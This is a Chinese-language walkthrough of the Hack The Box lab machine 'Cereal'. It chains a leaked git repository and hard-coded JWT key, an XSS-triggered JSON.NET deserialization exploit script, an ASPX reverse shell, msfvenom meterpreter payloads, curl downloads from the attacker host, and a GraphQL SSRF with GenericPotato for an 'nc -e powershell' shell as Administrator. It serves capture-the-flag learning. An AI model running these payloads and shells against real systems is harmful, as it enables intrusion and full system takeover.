基本信息

端口扫描

22,80,443:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ nmap -sC -sV 10.10.10.217
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-18 16:24 CST
Nmap scan report for 10.10.10.217
Host is up (0.076s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 08:8e:fe:04:8c:ad:6f:df:88:c7:f3:9a:c5:da:6d:ac (RSA)
|   256 fb:f5:7b:a1:68:07:c0:7b:73:d2:ad:33:df:0a:fc:ac (ECDSA)
|_  256 cc:0e:70:ec:33:42:59:78:31:c0:4e:c2:a5:c9:0e:1e (ED25519)
80/tcp  open  http     Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://10.10.10.217/
443/tcp open  ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Cereal
| ssl-cert: Subject: commonName=cereal.htb
| Subject Alternative Name: DNS:cereal.htb, DNS:source.cereal.htb
| Not valid before: 2020-11-11T19:57:18
|_Not valid after:  2040-11-11T20:07:19
|_ssl-date: 2021-01-18T08:25:57+00:00; 0s from scanner time.
| tls-alpn:
|_  http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.75 seconds

80/443

直接ip访问会跳到443 https,需要登录:

source.cereal.htb

前面扫描结果中有子域名,加hosts访问:

git leak

很容易发现git泄漏,那就dump下来分析代码:

JWT key

查看git log发现有security fix,回滚到之前的版本:

1
git reset --hard 8f2a1a88f15b9109e1f63e4e4551727bfb38eee5

在Services/UserService.cs中发现硬编码的jwt key:

1
var key = Encoding.ASCII.GetBytes("secretlhfIH&FY*#oysuflkhskjfhefesf");

反序列化

另外在Controllers\RequestsController.cs中发现反序列化:

XSS

ClientApp\src\AdminPage\AdminPage.jsx中有XSS:

利用链

大概就是通过XSS去触发反序列化

exploit

生成jwt

  • https://github.com/ticarpi/jwt_tool
1
2
3
python3 jwt_tool.py -b -S hs256 -p 'secretlhfIH&FY*#oysuflkhskjfhefesf' $(echo -n '{"alg":"HS256","typ":"JWT"}' | base64).$(echo -n '{"name": "1", "exp":' `date -d "+7 days" +%s`} | base64 -w0).

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiMSIsImV4cCI6MTYxMTI1MjY2NH0.FgxODspIu3yNTBepPeOCqxA8eAFPIFPox0AmAhzSLgU

csharp序列化

  • https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Cereal.DownloadHelper dh = new Cereal.DownloadHelper
{
	URL = "https://someurl/pic.png",
	FilePath = "pic.png",
};

string json = JsonConvert.SerializeObject(dh, new JsonSerializerSettings
{
	TypeNameHandling = TypeNameHandling.All
});
Console.WriteLine(json);

# output
{"$type":"Cereal.DownloadHelper, Cereal","URL":"http://10.10.14.11:7777/shell.aspx","FilePath":"c:/inetpub/source/uploads/shell.aspx"}

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import requests
from urllib3.exceptions import InsecureRequestWarning
import base64

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


jwt_token = '<token>'
my_ip = '<ip>'

URL = 'https://cereal.htb/requests'


js_payload = """var jwt_token = '"""+jwt_token+ """';
targeturl = 'https://cereal.htb/requests';

req = new XMLHttpRequest;
var payload = JSON.stringify({"json": '{"$type":"Cereal.DownloadHelper, Cereal","URL":"http://""" +my_ip+"""/shell.aspx","FilePath":"C:/inetpub/source/uploads/shell.aspx"}'});

req.onreadystatechange = function() {
    if (req.readyState == 4) {
        var id = JSON.parse(this.responseText).id;
        //console.log(id)

        req2 = new XMLHttpRequest;
        req2.open('GET', targeturl + "/" + id, false);
        req2.setRequestHeader("Authorization", "Bearer " + jwt_token);
        req2.send();
    }
}
req.open('POST', targeturl, false);
req.setRequestHeader("Authorization", "Bearer " + jwt_token);
req.setRequestHeader('Content-type', 'application/json');
req.send(payload);"""


js_payload_b64 = base64.b64encode(js_payload.encode('utf-8'))
payload = {'json': '{"title":"[XSS](javascript: eval(atob(%22' + js_payload_b64.decode('utf-8') + '%22%29%29)", "flavor":"x", "color":"#FFF", "description":"x"}'}
headers = {'Authorization': 'Bearer ' + jwt_token}


print("shending payload: " + str(payload))
r = requests.post(URL, headers=headers, json=payload, verify=False)
print(r.text)

exploit

1
2
3
4
5
6
python -m SimpleHTTPServer 7777
python3 exp.py
rlwrap nc -lvvp 4445

# 等收到http请求后再去访问触发shell
curl -k https://source.cereal.htb/uploads/shell.aspx

user flag

打到的sonny用户桌面得到user.txt:

信息搜集

netstat

端口发现有个8080端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
netstat -aon | findstr /i "listening"
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       1664
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       892
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8172           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       496
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       508
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1096
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       636
  TCP    0.0.0.0:49675          0.0.0.0:0              LISTENING       648
  TCP    10.10.10.217:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:49668        0.0.0.0:0              LISTENING       3416
  TCP    127.0.0.1:49671        0.0.0.0:0              LISTENING       3704
  TCP    [::]:22                [::]:0                 LISTENING       1664
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       892
  TCP    [::]:443               [::]:0                 LISTENING       4
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:8080              [::]:0                 LISTENING       4
  TCP    [::]:8172              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       496
  TCP    [::]:49665             [::]:0                 LISTENING       508
  TCP    [::]:49666             [::]:0                 LISTENING       1096
  TCP    [::]:49667             [::]:0                 LISTENING       636
  TCP    [::]:49675             [::]:0                 LISTENING       648
  TCP    [::1]:49668            [::]:0                 LISTENING       3416

whoami

whoami发现有SeImpersonatePrivilege权限:

1
2
3
4
5
6
7
8
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

meterpreter

方便操作可以加载个meterpreter:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# local
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4446 -b "\x00\x0a" -a x64 --platform windows -f exe -o miao.exe

msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.18
set LPORT 4446
run

# target
mkdir C:\temp
cd C:\temp
curl http://10.10.14.18:7777/miao.exe -o C:\temp\miao.exe
.\miao.exe

portfwd

把8080端口转发出来:

1
portfwd add -l 8081 -p 8080 -r 127.0.0.1

然后访问本地8081就相当于访问靶机8080:

Graphql

可以看到是graphal:

经过枚举发现可调用updatePlant函数,可以用来做SSRF

exploit

ssrf + SeImpersonatePrivilege > juicy potato with http:

1
2
3
4
5
6
7
8
9
curl http://10.10.14.18:7777/nc64.exe -o C:\temp\nc64.exe
curl http://10.10.14.18:7777/GenericPotato.exe -o C:\temp\GenericPotato.exe
curl http://10.10.14.18:7777/NtApiDotNet.xml -o C:\temp\NtApiDotNet.xml
.\GenericPotato.exe -p "C:\temp\nc64.exe" -a "10.10.14.18 4447 -e powershell" -e HTTP -l 8889
.\GenericPotato.exe -p "C:\temp\nc64.exe" -a "<my_ip> 9005 -e powershell" -e HTTP -l 8889

rlwrap nc -lvvp 4447

curl -k -X "POST" -H "Content-Type: application/json" --data-binary '{"query":"mutation{updatePlant(plantId:2, version:2.2, sourceURL:\"http://localhost:8889\")}"}' 'http://localhost:8081/api/graphql'

root flag

然后Administrator用户桌面得到root.txt:

参考资料